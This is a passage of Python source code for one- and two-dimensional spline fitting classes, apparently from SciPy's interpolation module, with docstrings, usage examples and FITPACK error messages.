>>> y = np.exp(-x**2) + 0.1 * np.random.randn(50)\n >>> plt.plot(x, y, 'ro', ms=5)\n\n Use the default value for the smoothing parameter:\n\n >>> spl = UnivariateSpline(x, y)\n >>> xs = np.linspace(-3, 3, 1000)\n >>> plt.plot(xs, spl(xs), 'g', lw=3)\n\n Manually change the amount of smoothing:\n\n >>> spl.set_smoothing_factor(0.5)\n >>> plt.plot(xs, spl(xs), 'b', lw=3)\n >>> plt.show()\n\n \"\"\"\n def __init__(self, x, y, w=None, bbox=[None]*2, k=3, s=None,\n ext=0, check_finite=False):\n\n if check_finite:\n if not np.isfinite(x).all() or not np.isfinite(y).all():\n raise ValueError(\"x and y array must not contain NaNs or infs.\")\n\n # _data == x,y,w,xb,xe,k,s,n,t,c,fp,fpint,nrdata,ier\n try:\n self.ext = _extrap_modes[ext]\n except KeyError:\n raise ValueError(\"Unknown extrapolation mode %s.\" % ext)\n\n data = dfitpack.fpcurf0(x,y,k,w=w,\n xb=bbox[0],xe=bbox[1],s=s)\n if data[-1] == 1:\n # nest too small, setting to maximum bound\n data = self._reset_nest(data)\n self._data = data\n self._reset_class()\n\n @classmethod\n def _from_tck(cls, tck, ext=0):\n \"\"\"Construct a spline object from given tck\"\"\"\n self = cls.__new__(cls)\n t, c, k = tck\n self._eval_args = tck\n #_data == x,y,w,xb,xe,k,s,n,t,c,fp,fpint,nrdata,ier\n self._data = (None,None,None,None,None,k,None,len(t),t,\n c,None,None,None,None)\n self.ext = ext\n return self\n\n def _reset_class(self):\n 
data = self._data\n n,t,c,k,ier = data[7],data[8],data[9],data[5],data[-1]\n self._eval_args = t[:n],c[:n],k\n if ier == 0:\n # the spline returned has a residual sum of squares fp\n # such that abs(fp-s)/s <= tol with tol a relative\n # tolerance set to 0.001 by the program\n pass\n elif ier == -1:\n # the spline returned is an interpolating spline\n self._set_class(InterpolatedUnivariateSpline)\n elif ier == -2:\n # the spline returned is the weighted least-squares\n # polynomial of degree k. In this extreme case fp gives\n # the upper bound fp0 for the smoothing factor s.\n self._set_class(LSQUnivariateSpline)\n else:\n # error\n if ier == 1:\n self._set_class(LSQUnivariateSpline)\n message = _curfit_messages.get(ier,'ier=%s' % (ier))\n warnings.warn(message)\n\n def _set_class(self, cls):\n self._spline_class = cls\n if self.__class__ in (UnivariateSpline, InterpolatedUnivariateSpline,\n LSQUnivariateSpline):\n self.__class__ = cls\n else:\n # It's an unknown subclass -- don't change class. cf. #731\n pass\n\n def _reset_nest(self, data, nest=None):\n n = data[10]\n if nest is None:\n k,m = data[5],len(data[0])\n nest = m+k+1 # this is the maximum bound for nest\n else:\n if not n <= nest:\n raise ValueError(\"`nest` can only be increased\")\n t, c, fpint, nrdata = [np.resize(data[j], nest) for j in [8,9,11,12]]\n\n args = data[:8] + (t,c,n,fpint,nrdata,data[13])\n data = dfitpack.fpcurf1(*args)\n return data\n\n def set_smoothing_factor(self, s):\n \"\"\" Continue spline computation with the given smoothing\n factor s and with the knots found at the last call.\n\n This routine modifies the spline in place.\n\n \"\"\"\n data = self._data\n if data[6] == -1:\n warnings.warn('smoothing factor unchanged for'\n 'LSQ spline with fixed knots')\n return\n args = data[:6] + (s,) + data[7:]\n data = dfitpack.fpcurf1(*args)\n if data[-1] == 1:\n # nest too small, setting to maximum bound\n data = self._reset_nest(data)\n self._data = data\n self._reset_class()\n\n def __call__(self, x, nu=0, ext=None):\n \"\"\"\n Evaluate spline (or its nu-th derivative) at positions x.\n\n Parameters\n ----------\n x : array_like\n A 1-D array of points at which to return the value of the smoothed\n spline or its derivatives. 
Note: x can be unordered but the\n evaluation is more efficient if x is (partially) ordered.\n nu : int\n The order of derivative of the spline to compute.\n ext : int\n Controls the value returned for elements of ``x`` not in the\n interval defined by the knot sequence.\n\n * if ext=0 or 'extrapolate', return the extrapolated value.\n * if ext=1 or 'zeros', return 0\n * if ext=2 or 'raise', raise a ValueError\n * if ext=3 or 'const', return the boundary value.\n\n The default value is 0, passed from the initialization of\n UnivariateSpline.\n\n \"\"\"\n x = np.asarray(x)\n # empty input yields empty output\n if x.size == 0:\n return array([])\n# if nu is None:\n# return dfitpack.splev(*(self._eval_args+(x,)))\n# return dfitpack.splder(nu=nu,*(self._eval_args+(x,)))\n if ext is None:\n ext = self.ext\n else:\n try:\n ext = _extrap_modes[ext]\n except KeyError:\n raise ValueError(\"Unknown extrapolation mode %s.\" % ext)\n return fitpack.splev(x, self._eval_args, der=nu, ext=ext)\n\n def get_knots(self):\n \"\"\" Return positions of interior knots of the spline.\n\n Internally, the knot vector contains ``2*k`` additional boundary knots.\n \"\"\"\n data = self._data\n k,n = data[5],data[7]\n return data[8][k:n-k]\n\n def get_coeffs(self):\n \"\"\"Return spline coefficients.\"\"\"\n data = self._data\n k,n = data[5],data[7]\n return data[9][:n-k-1]\n\n def get_residual(self):\n \"\"\"Return weighted sum of squared residuals of the spline approximation.\n\n This is equivalent to::\n\n sum((w[i] * (y[i]-spl(x[i])))**2, axis=0)\n\n \"\"\"\n return self._data[10]\n\n def integral(self, a, b):\n \"\"\" Return definite integral of the spline between two given points.\n\n Parameters\n ----------\n a : float\n Lower limit of integration.\n b : float\n Upper limit of integration.\n\n Returns\n -------\n integral : float\n The value of the definite integral of the spline between limits.\n\n Examples\n --------\n >>> from scipy.interpolate import UnivariateSpline\n >>> x = np.linspace(0, 3, 11)\n >>> y = x**2\n >>> spl = UnivariateSpline(x, y)\n >>> spl.integral(0, 3)\n 9.0\n\n which agrees with :math:`\\int x^2 dx = x^3 / 3` between the limits\n of 0 and 3.\n\n A caveat is that this routine assumes the spline to be zero outside of\n the data limits:\n\n >>> spl.integral(-1, 4)\n 9.0\n >>> spl.integral(-1, 0)\n 0.0\n\n \"\"\"\n return dfitpack.splint(*(self._eval_args+(a,b)))\n\n def derivatives(self, x):\n \"\"\" Return all derivatives of the spline at the point x.\n\n Parameters\n ----------\n x : float\n The point to evaluate the derivatives at.\n\n Returns\n -------\n der : ndarray, shape(k+1,)\n Derivatives of the orders 0 to k.\n\n Examples\n --------\n >>> from scipy.interpolate import UnivariateSpline\n >>> x = np.linspace(0, 3, 11)\n >>> y = x**2\n >>> spl = UnivariateSpline(x, y)\n >>> spl.derivatives(1.5)\n array([2.25, 3.0, 2.0, 0])\n\n \"\"\"\n d,ier = dfitpack.spalde(*(self._eval_args+(x,)))\n if not ier == 0:\n raise ValueError(\"Error code returned by spalde: %s\" % ier)\n return d\n\n def roots(self):\n \"\"\" Return the zeros of the spline.\n\n Restriction: only cubic splines are supported by fitpack.\n \"\"\"\n k = self._data[5]\n if k == 3:\n z,m,ier = dfitpack.sproot(*self._eval_args[:2])\n if not ier == 0:\n raise ValueError(\"Error code returned by spalde: %s\" % ier)\n return z[:m]\n raise NotImplementedError('finding roots unsupported for '\n 'non-cubic splines')\n\n def derivative(self, n=1):\n \"\"\"\n Construct a new spline representing the derivative of this spline.\n\n 
Parameters\n ----------\n n : int, optional\n Order of derivative to evaluate. Default: 1\n\n Returns\n -------\n spline : UnivariateSpline\n Spline of order k2=k-n representing the derivative of this\n spline.\n\n See Also\n --------\n splder, antiderivative\n\n Notes\n -----\n\n .. versionadded:: 0.13.0\n\n Examples\n --------\n This can be used for finding maxima of a curve:\n\n >>> from scipy.interpolate import UnivariateSpline\n >>> x = np.linspace(0, 10, 70)\n >>> y = np.sin(x)\n >>> spl = UnivariateSpline(x, y, k=4, s=0)\n\n Now, differentiate the spline and find the zeros of the\n derivative. (NB: `sproot` only works for order 3 splines, so we\n fit an order 4 spline):\n\n >>> spl.derivative().roots() / np.pi\n array([ 0.50000001, 1.5 , 2.49999998])\n\n This agrees well with roots :math:`\\pi/2 + n\\pi` of `cos(x) = sin'(x)`.\n\n \"\"\"\n tck = fitpack.splder(self._eval_args, n)\n return UnivariateSpline._from_tck(tck, self.ext)\n\n def antiderivative(self, n=1):\n \"\"\"\n Construct a new spline representing the antiderivative of this spline.\n\n Parameters\n ----------\n n : int, optional\n Order of antiderivative to evaluate. Default: 1\n\n Returns\n -------\n spline : UnivariateSpline\n Spline of order k2=k+n representing the antiderivative of this\n spline.\n\n Notes\n -----\n\n .. versionadded:: 0.13.0\n\n See Also\n --------\n splantider, derivative\n\n Examples\n --------\n >>> from scipy.interpolate import UnivariateSpline\n >>> x = np.linspace(0, np.pi/2, 70)\n >>> y = 1 / np.sqrt(1 - 0.8*np.sin(x)**2)\n >>> spl = UnivariateSpline(x, y, s=0)\n\n The derivative is the inverse operation of the antiderivative,\n although some floating point error accumulates:\n\n >>> spl(1.7), spl.antiderivative().derivative()(1.7)\n (array(2.1565429877197317), array(2.1565429877201865))\n\n Antiderivative can be used to evaluate definite integrals:\n\n >>> ispl = spl.antiderivative()\n >>> ispl(np.pi/2) - ispl(0)\n 2.2572053588768486\n\n This is indeed an approximation to the complete elliptic integral\n :math:`K(m) = \\\\int_0^{\\\\pi/2} [1 - m\\\\sin^2 x]^{-1/2} dx`:\n\n >>> from scipy.special import ellipk\n >>> ellipk(0.8)\n 2.2572053268208538\n\n \"\"\"\n tck = fitpack.splantider(self._eval_args, n)\n return UnivariateSpline._from_tck(tck, self.ext)\n\n\nclass InterpolatedUnivariateSpline(UnivariateSpline):\n \"\"\"\n One-dimensional interpolating spline for a given set of data points.\n\n Fits a spline y = spl(x) of degree `k` to the provided `x`, `y` data. Spline\n function passes through all provided points. Equivalent to\n `UnivariateSpline` with s=0.\n\n Parameters\n ----------\n x : (N,) array_like\n Input dimension of data points -- must be increasing\n y : (N,) array_like\n input dimension of data points\n w : (N,) array_like, optional\n Weights for spline fitting. Must be positive. If None (default),\n weights are all equal.\n bbox : (2,) array_like, optional\n 2-sequence specifying the boundary of the approximation interval. If\n None (default), ``bbox=[x[0], x[-1]]``.\n k : int, optional\n Degree of the smoothing spline. 
Must be 1 <= `k` <= 5.\n ext : int or str, optional\n Controls the extrapolation mode for elements\n not in the interval defined by the knot sequence.\n\n * if ext=0 or 'extrapolate', return the extrapolated value.\n * if ext=1 or 'zeros', return 0\n * if ext=2 or 'raise', raise a ValueError\n * if ext=3 of 'const', return the boundary value.\n\n The default value is 0.\n\n check_finite : bool, optional\n Whether to check that the input arrays contain only finite numbers.\n Disabling may give a performance gain, but may result in problems\n (crashes, non-termination or non-sensical results) if the inputs\n do contain infinities or NaNs.\n Default is False.\n\n See Also\n --------\n UnivariateSpline : Superclass -- allows knots to be selected by a\n smoothing condition\n LSQUnivariateSpline : spline for which knots are user-selected\n splrep : An older, non object-oriented wrapping of FITPACK\n splev, sproot, splint, spalde\n BivariateSpline : A similar class for two-dimensional spline interpolation\n\n Notes\n -----\n The number of data points must be larger than the spline degree `k`.\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> from scipy.interpolate import InterpolatedUnivariateSpline\n >>> x = np.linspace(-3, 3, 50)\n >>> y = np.exp(-x**2) + 0.1 * np.random.randn(50)\n >>> spl = InterpolatedUnivariateSpline(x, y)\n >>> plt.plot(x, y, 'ro', ms=5)\n >>> xs = np.linspace(-3, 3, 1000)\n >>> plt.plot(xs, spl(xs), 'g', lw=3, alpha=0.7)\n >>> plt.show()\n\n Notice that the ``spl(x)`` interpolates `y`:\n\n >>> spl.get_residual()\n 0.0\n\n \"\"\"\n def __init__(self, x, y, w=None, bbox=[None]*2, k=3,\n ext=0, check_finite=False):\n\n if check_finite:\n if (not np.isfinite(x).all() or not np.isfinite(y).all() or\n not np.isfinite(w).all()):\n raise ValueError(\"Input must not contain NaNs or infs.\")\n\n # _data == x,y,w,xb,xe,k,s,n,t,c,fp,fpint,nrdata,ier\n self._data = dfitpack.fpcurf0(x,y,k,w=w,\n xb=bbox[0],xe=bbox[1],s=0)\n self._reset_class()\n\n try:\n self.ext = _extrap_modes[ext]\n except KeyError:\n raise ValueError(\"Unknown extrapolation mode %s.\" % ext)\n\n\n_fpchec_error_string = \"\"\"The input parameters have been rejected by fpchec. \\\nThis means that at least one of the following conditions is violated:\n\n1) k+1 <= n-k-1 <= m\n2) t(1) <= t(2) <= ... <= t(k+1)\n t(n-k) <= t(n-k+1) <= ... <= t(n)\n3) t(k+1) < t(k+2) < ... < t(n-k)\n4) t(k+1) <= x(i) <= t(n-k)\n5) The conditions specified by Schoenberg and Whitney must hold\n for at least one subset of data points, i.e., there must be a\n subset of data points y(j) such that\n t(j) < y(j) < t(j+k+1), j=1,2,...,n-k-1\n\"\"\"\n\n\nclass LSQUnivariateSpline(UnivariateSpline):\n \"\"\"\n One-dimensional spline with explicit internal knots.\n\n Fits a spline y = spl(x) of degree `k` to the provided `x`, `y` data. `t`\n specifies the internal knots of the spline\n\n Parameters\n ----------\n x : (N,) array_like\n Input dimension of data points -- must be increasing\n y : (N,) array_like\n Input dimension of data points\n t : (M,) array_like\n interior knots of the spline. Must be in ascending order and::\n\n bbox[0] < t[0] < ... < t[-1] < bbox[-1]\n\n w : (N,) array_like, optional\n weights for spline fitting. Must be positive. If None (default),\n weights are all equal.\n bbox : (2,) array_like, optional\n 2-sequence specifying the boundary of the approximation interval. If\n None (default), ``bbox = [x[0], x[-1]]``.\n k : int, optional\n Degree of the smoothing spline. 
Must be 1 <= `k` <= 5.\n Default is k=3, a cubic spline.\n ext : int or str, optional\n Controls the extrapolation mode for elements\n not in the interval defined by the knot sequence.\n\n * if ext=0 or 'extrapolate', return the extrapolated value.\n * if ext=1 or 'zeros', return 0\n * if ext=2 or 'raise', raise a ValueError\n * if ext=3 of 'const', return the boundary value.\n\n The default value is 0.\n\n check_finite : bool, optional\n Whether to check that the input arrays contain only finite numbers.\n Disabling may give a performance gain, but may result in problems\n (crashes, non-termination or non-sensical results) if the inputs\n do contain infinities or NaNs.\n Default is False.\n\n Raises\n ------\n ValueError\n If the interior knots do not satisfy the Schoenberg-Whitney conditions\n\n See Also\n --------\n UnivariateSpline : Superclass -- knots are specified by setting a\n smoothing condition\n InterpolatedUnivariateSpline : spline passing through all points\n splrep : An older, non object-oriented wrapping of FITPACK\n splev, sproot, splint, spalde\n BivariateSpline : A similar class for two-dimensional spline interpolation\n\n Notes\n -----\n The number of data points must be larger than the spline degree `k`.\n\n Knots `t` must satisfy the Schoenberg-Whitney conditions,\n i.e., there must be a subset of data points ``x[j]`` such that\n ``t[j] < x[j] < t[j+k+1]``, for ``j=0, 1,...,n-k-2``.\n\n Examples\n --------\n >>> from scipy.interpolate import LSQUnivariateSpline, UnivariateSpline\n >>> import matplotlib.pyplot as plt\n >>> x = np.linspace(-3, 3, 50)\n >>> y = np.exp(-x**2) + 0.1 * np.random.randn(50)\n\n Fit a smoothing spline with a pre-defined internal knots:\n\n >>> t = [-1, 0, 1]\n >>> spl = LSQUnivariateSpline(x, y, t)\n\n >>> xs = np.linspace(-3, 3, 1000)\n >>> plt.plot(x, y, 'ro', ms=5)\n >>> plt.plot(xs, spl(xs), 'g-', lw=3)\n >>> plt.show()\n\n Check the knot vector:\n\n >>> spl.get_knots()\n array([-3., -1., 0., 1., 3.])\n\n Constructing lsq spline using the knots from another spline:\n\n >>> x = np.arange(10)\n >>> s = UnivariateSpline(x, x, s=0)\n >>> s.get_knots()\n array([ 0., 2., 3., 4., 5., 6., 7., 9.])\n >>> knt = s.get_knots()\n >>> s1 = LSQUnivariateSpline(x, x, knt[1:-1]) # Chop 1st and last knot\n >>> s1.get_knots()\n array([ 0., 2., 3., 4., 5., 6., 7., 9.])\n\n \"\"\"\n\n def __init__(self, x, y, t, w=None, bbox=[None]*2, k=3,\n ext=0, check_finite=False):\n\n if check_finite:\n if (not np.isfinite(x).all() or not np.isfinite(y).all() or\n not np.isfinite(w).all() or not np.isfinite(t).all()):\n raise ValueError(\"Input(s) must not contain NaNs or infs.\")\n\n # _data == x,y,w,xb,xe,k,s,n,t,c,fp,fpint,nrdata,ier\n xb = bbox[0]\n xe = bbox[1]\n if xb is None:\n xb = x[0]\n if xe is None:\n xe = x[-1]\n t = concatenate(([xb]*(k+1), t, [xe]*(k+1)))\n n = len(t)\n if not alltrue(t[k+1:n-k]-t[k:n-k-1] > 0, axis=0):\n raise ValueError('Interior knots t must satisfy '\n 'Schoenberg-Whitney conditions')\n if not dfitpack.fpchec(x, t, k) == 0:\n raise ValueError(_fpchec_error_string)\n data = dfitpack.fpcurfm1(x, y, k, t, w=w, xb=xb, xe=xe)\n self._data = data[:-3] + (None, None, data[-1])\n self._reset_class()\n\n try:\n self.ext = _extrap_modes[ext]\n except KeyError:\n raise ValueError(\"Unknown extrapolation mode %s.\" % ext)\n\n\n################ Bivariate spline ####################\n\nclass _BivariateSplineBase(object):\n \"\"\" Base class for Bivariate spline s(x,y) interpolation on the rectangle\n [xb,xe] x [yb, ye] calculated from a given set of 
data points\n (x,y,z).\n\n See Also\n --------\n bisplrep, bisplev : an older wrapping of FITPACK\n BivariateSpline :\n implementation of bivariate spline interpolation on a plane grid\n SphereBivariateSpline :\n implementation of bivariate spline interpolation on a spherical grid\n \"\"\"\n\n def get_residual(self):\n \"\"\" Return weighted sum of squared residuals of the spline\n approximation: sum ((w[i]*(z[i]-s(x[i],y[i])))**2,axis=0)\n \"\"\"\n return self.fp\n\n def get_knots(self):\n \"\"\" Return a tuple (tx,ty) where tx,ty contain knots positions\n of the spline with respect to x-, y-variable, respectively.\n The position of interior and additional knots are given as\n t[k+1:-k-1] and t[:k+1]=b, t[-k-1:]=e, respectively.\n \"\"\"\n return self.tck[:2]\n\n def get_coeffs(self):\n \"\"\" Return spline coefficients.\"\"\"\n return self.tck[2]\n\n def __call__(self, x, y, mth=None, dx=0, dy=0, grid=True):\n \"\"\"\n Evaluate the spline or its derivatives at given positions.\n\n Parameters\n ----------\n x, y : array_like\n Input coordinates.\n\n If `grid` is False, evaluate the spline at points ``(x[i],\n y[i]), i=0, ..., len(x)-1``. Standard Numpy broadcasting\n is obeyed.\n\n If `grid` is True: evaluate spline at the grid points\n defined by the coordinate arrays x, y. The arrays must be\n sorted to increasing order.\n dx : int\n Order of x-derivative\n\n .. versionadded:: 0.14.0\n dy : int\n Order of y-derivative\n\n .. versionadded:: 0.14.0\n grid : bool\n Whether to evaluate the results on a grid spanned by the\n input arrays, or at points specified by the input arrays.\n\n .. versionadded:: 0.14.0\n\n mth : str\n Deprecated argument. Has no effect.\n\n \"\"\"\n x = np.asarray(x)\n y = np.asarray(y)\n\n if mth is not None:\n warnings.warn(\"The `mth` argument is deprecated and will be removed\",\n FutureWarning)\n\n tx, ty, c = self.tck[:3]\n kx, ky = self.degrees\n if grid:\n if x.size == 0 or y.size == 0:\n return np.zeros((x.size, y.size), dtype=self.tck[2].dtype)\n\n if dx or dy:\n z,ier = dfitpack.parder(tx,ty,c,kx,ky,dx,dy,x,y)\n if not ier == 0:\n raise ValueError(\"Error code returned by parder: %s\" % ier)\n else:\n z,ier = dfitpack.bispev(tx,ty,c,kx,ky,x,y)\n if not ier == 0:\n raise ValueError(\"Error code returned by bispev: %s\" % ier)\n else:\n # standard Numpy broadcasting\n if x.shape != y.shape:\n x, y = np.broadcast_arrays(x, y)\n\n shape = x.shape\n x = x.ravel()\n y = y.ravel()\n\n if x.size == 0 or y.size == 0:\n return np.zeros(shape, dtype=self.tck[2].dtype)\n\n if dx or dy:\n z,ier = dfitpack.pardeu(tx,ty,c,kx,ky,dx,dy,x,y)\n if not ier == 0:\n raise ValueError(\"Error code returned by pardeu: %s\" % ier)\n else:\n z,ier = dfitpack.bispeu(tx,ty,c,kx,ky,x,y)\n if not ier == 0:\n raise ValueError(\"Error code returned by bispeu: %s\" % ier)\n\n z = z.reshape(shape)\n return z\n\n\n_surfit_messages = {1:\"\"\"\nThe required storage space exceeds the available storage space: nxest\nor nyest too small, or s too small.\nThe weighted least-squares spline corresponds to the current set of\nknots.\"\"\",\n 2:\"\"\"\nA theoretically impossible result was found during the iteration\nprocess for finding a smoothing spline with fp = s: s too small or\nbadly chosen eps.\nWeighted sum of squared residuals does not satisfy abs(fp-s)/s < tol.\"\"\",\n 3:\"\"\"\nthe maximal number of iterations maxit (set to 20 by the program)\nallowed for finding a smoothing spline with fp=s has been reached:\ns too small.\nWeighted sum of squared residuals does not satisfy abs(fp-s)/s < 
tol.\"\"\",\n 4:\"\"\"\nNo more knots can be added because the number of b-spline coefficients\n(nx-kx-1)*(ny-ky-1) already exceeds the number of data points m:\neither s or m too small.\nThe weighted least-squares spline corresponds to the current set of\nknots.\"\"\",\n 5:\"\"\"\nNo more knots can be added because the additional knot would (quasi)\ncoincide with an old one: s too small or too large a weight to an\ninaccurate data point.\nThe weighted least-squares spline corresponds to the current set of\nknots.\"\"\",\n 10:\"\"\"\nError on entry, no approximation returned. The following conditions\nmust hold:\nxb<=x[i]<=xe, yb<=y[i]<=ye, w[i]>0, i=0..m-1\nIf iopt==-1, then\n xb<tx[kx+1]<tx[kx+2]<...<tx[nx-kx-2]<xe\n yb<ty[ky+1]<ty[ky+2]<...<ty[ny-ky-2]<ye\"\"\",\n -3:\"\"\"\nThe coefficients of the spline returned have been computed as the\nminimal norm least-squares solution of a (numerically) rank deficient\nsystem (deficiency=%i). If deficiency is large, the results may be\ninaccurate. Deficiency may strongly depend on the value of eps.\"\"\"\n }\n\n\nclass BivariateSpline(_BivariateSplineBase):\n \"\"\"\n Base class for bivariate splines.\n\n This describes a spline ``s(x, y)`` of degrees ``kx`` and ``ky`` on\n the rectangle ``[xb, xe] * [yb, ye]`` calculated from a given set\n of data points ``(x, y, z)``.\n\n This class is meant to be subclassed, not instantiated directly.\n To construct these splines, call either `SmoothBivariateSpline` or\n `LSQBivariateSpline`.\n\n See Also\n --------\n UnivariateSpline : a similar class for univariate spline interpolation\n SmoothBivariateSpline :\n to create a BivariateSpline through the given points\n LSQBivariateSpline :\n to create a BivariateSpline using weighted least-squares fitting\n SphereBivariateSpline :\n bivariate spline interpolation in spherical cooridinates\n bisplrep : older wrapping of FITPACK\n bisplev : older wrapping of FITPACK\n\n \"\"\"\n\n @classmethod\n def _from_tck(cls, tck):\n \"\"\"Construct a spline object from given tck and degree\"\"\"\n self = cls.__new__(cls)\n if len(tck) != 5:\n raise ValueError(\"tck should be a 5 element tuple of tx, ty, c, kx, ky\")\n self.tck = tck[:3]\n self.degrees = tck[3:]\n return self\n\n def ev(self, xi, yi, dx=0, dy=0):\n \"\"\"\n Evaluate the spline at points\n\n Returns the interpolated value at ``(xi[i], yi[i]),\n i=0,...,len(xi)-1``.\n\n Parameters\n ----------\n xi, yi : array_like\n Input coordinates. Standard Numpy broadcasting is obeyed.\n dx : int, optional\n Order of x-derivative\n\n .. versionadded:: 0.14.0\n dy : int, optional\n Order of y-derivative\n\n .. 
versionadded:: 0.14.0\n \"\"\"\n return self.__call__(xi, yi, dx=dx, dy=dy, grid=False)\n\n def integral(self, xa, xb, ya, yb):\n \"\"\"\n Evaluate the integral of the spline over area [xa,xb] x [ya,yb].\n\n Parameters\n ----------\n xa, xb : float\n The end-points of the x integration interval.\n ya, yb : float\n The end-points of the y integration interval.\n\n Returns\n -------\n integ : float\n The value of the resulting integral.\n\n \"\"\"\n tx,ty,c = self.tck[:3]\n kx,ky = self.degrees\n return dfitpack.dblint(tx,ty,c,kx,ky,xa,xb,ya,yb)\n\n\nclass SmoothBivariateSpline(BivariateSpline):\n \"\"\"\n Smooth bivariate spline approximation.\n\n Parameters\n ----------\n x, y, z : array_like\n 1-D sequences of data points (order is not important).\n w : array_like, optional\n Positive 1-D sequence of weights, of same length as `x`, `y` and `z`.\n bbox : array_like, optional\n Sequence of length 4 specifying the boundary of the rectangular\n approximation domain. By default,\n ``bbox=[min(x,tx),max(x,tx), min(y,ty),max(y,ty)]``.\n kx, ky : ints, optional\n Degrees of the bivariate spline. Default is 3.\n s : float, optional\n Positive smoothing factor defined for estimation condition:\n ``sum((w[i]*(z[i]-s(x[i], y[i])))**2, axis=0) <= s``\n Default ``s=len(w)`` which should be a good value if ``1/w[i]`` is an\n estimate of the standard deviation of ``z[i]``.\n eps : float, optional\n A threshold for determining the effective rank of an over-determined\n linear system of equations. `eps` should have a value between 0 and 1,\n the default is 1e-16.\n\n See Also\n --------\n bisplrep : an older wrapping of FITPACK\n bisplev : an older wrapping of FITPACK\n UnivariateSpline : a similar class for univariate spline interpolation\n LSQUnivariateSpline : to create a BivariateSpline using weighted\n\n Notes\n -----\n The length of `x`, `y` and `z` should be at least ``(kx+1) * (ky+1)``.\n\n \"\"\"\n\n def __init__(self, x, y, z, w=None, bbox=[None] * 4, kx=3, ky=3, s=None,\n eps=None):\n xb,xe,yb,ye = bbox\n nx,tx,ny,ty,c,fp,wrk1,ier = dfitpack.surfit_smth(x,y,z,w,\n xb,xe,yb,ye,\n kx,ky,s=s,\n eps=eps,lwrk2=1)\n if ier > 10: # lwrk2 was to small, re-run\n nx,tx,ny,ty,c,fp,wrk1,ier = dfitpack.surfit_smth(x,y,z,w,\n xb,xe,yb,ye,\n kx,ky,s=s,\n eps=eps,lwrk2=ier)\n if ier in [0,-1,-2]: # normal return\n pass\n else:\n message = _surfit_messages.get(ier,'ier=%s' % (ier))\n warnings.warn(message)\n\n self.fp = fp\n self.tck = tx[:nx],ty[:ny],c[:(nx-kx-1)*(ny-ky-1)]\n self.degrees = kx,ky\n\n\nclass LSQBivariateSpline(BivariateSpline):\n \"\"\"\n Weighted least-squares bivariate spline approximation.\n\n Parameters\n ----------\n x, y, z : array_like\n 1-D sequences of data points (order is not important).\n tx, ty : array_like\n Strictly ordered 1-D sequences of knots coordinates.\n w : array_like, optional\n Positive 1-D array of weights, of the same length as `x`, `y` and `z`.\n bbox : (4,) array_like, optional\n Sequence of length 4 specifying the boundary of the rectangular\n approximation domain. By default,\n ``bbox=[min(x,tx),max(x,tx), min(y,ty),max(y,ty)]``.\n kx, ky : ints, optional\n Degrees of the bivariate spline. Default is 3.\n eps : float, optional\n A threshold for determining the effective rank of an over-determined\n linear system of equations. 
`eps` should have a value between 0 and 1,\n the default is 1e-16.\n\n See Also\n --------\n bisplrep : an older wrapping of FITPACK\n bisplev : an older wrapping of FITPACK\n UnivariateSpline : a similar class for univariate spline interpolation\n SmoothBivariateSpline : create a smoothing BivariateSpline\n\n Notes\n -----\n The length of `x`, `y` and `z` should be at least ``(kx+1) * (ky+1)``.\n\n \"\"\"\n\n def __init__(self, x, y, z, tx, ty, w=None, bbox=[None]*4, kx=3, ky=3,\n eps=None):\n nx = 2*kx+2+len(tx)\n ny = 2*ky+2+len(ty)\n tx1 = zeros((nx,),float)\n ty1 = zeros((ny,),float)\n tx1[kx+1:nx-kx-1] = tx\n ty1[ky+1:ny-ky-1] = ty\n\n xb,xe,yb,ye = bbox\n tx1,ty1,c,fp,ier = dfitpack.surfit_lsq(x,y,z,tx1,ty1,w,\n xb,xe,yb,ye,\n kx,ky,eps,lwrk2=1)\n if ier > 10:\n tx1,ty1,c,fp,ier = dfitpack.surfit_lsq(x,y,z,tx1,ty1,w,\n xb,xe,yb,ye,\n kx,ky,eps,lwrk2=ier)\n if ier in [0,-1,-2]: # normal return\n pass\n else:\n if ier < -2:\n deficiency = (nx-kx-1)*(ny-ky-1)+ier\n message = _surfit_messages.get(-3) % (deficiency)\n else:\n message = _surfit_messages.get(ier, 'ier=%s' % (ier))\n warnings.warn(message)\n self.fp = fp\n self.tck = tx1, ty1, c\n self.degrees = kx, ky\n\n\nclass RectBivariateSpline(BivariateSpline):\n \"\"\"\n Bivariate spline approximation over a rectangular mesh.\n\n Can be used for both smoothing and interpolating data.\n\n Parameters\n ----------\n x,y : array_like\n 1-D arrays of coordinates in strictly ascending order.\n z : array_like\n 2-D array of data with shape (x.size,y.size).\n bbox : array_like, optional\n Sequence of length 4 specifying the boundary of the rectangular\n approximation domain. By default,\n ``bbox=[min(x,tx),max(x,tx), min(y,ty),max(y,ty)]``.\n kx, ky : ints, optional\n Degrees of the bivariate spline. Default is 3.\n s : float, optional\n Positive smoothing factor defined for estimation condition:\n ``sum((w[i]*(z[i]-s(x[i], y[i])))**2, axis=0) <= s``\n Default is ``s=0``, which is for interpolation.\n\n See Also\n --------\n SmoothBivariateSpline : a smoothing bivariate spline for scattered data\n bisplrep : an older wrapping of FITPACK\n bisplev : an older wrapping of FITPACK\n UnivariateSpline : a similar class for univariate spline interpolation\n\n \"\"\"\n\n def __init__(self, x, y, z, bbox=[None] * 4, kx=3, ky=3, s=0):\n x, y = ravel(x), ravel(y)\n if not all(diff(x) > 0.0):\n raise TypeError('x must be strictly increasing')\n if not all(diff(y) > 0.0):\n raise TypeError('y must be strictly increasing')\n if not ((x.min() == x[0]) and (x.max() == x[-1])):\n raise TypeError('x must be strictly ascending')\n if not ((y.min() == y[0]) and (y.max() == y[-1])):\n raise TypeError('y must be strictly ascending')\n if not x.size == z.shape[0]:\n raise TypeError('x dimension of z must have same number of '\n 'elements as x')\n if not y.size == z.shape[1]:\n raise TypeError('y dimension of z must have same number of '\n 'elements as y')\n z = ravel(z)\n xb, xe, yb, ye = bbox\n nx, tx, ny, ty, c, fp, ier = dfitpack.regrid_smth(x, y, z, xb, xe, yb,\n ye, kx, ky, s)\n\n if ier not in [0, -1, -2]:\n msg = _surfit_messages.get(ier, 'ier=%s' % (ier))\n raise ValueError(msg)\n\n self.fp = fp\n self.tck = tx[:nx], ty[:ny], c[:(nx - kx - 1) * (ny - ky - 1)]\n self.degrees = kx, ky\n\n\n_spherefit_messages = _surfit_messages.copy()\n_spherefit_messages[10] = \"\"\"\nERROR. On entry, the input data are controlled on validity. 
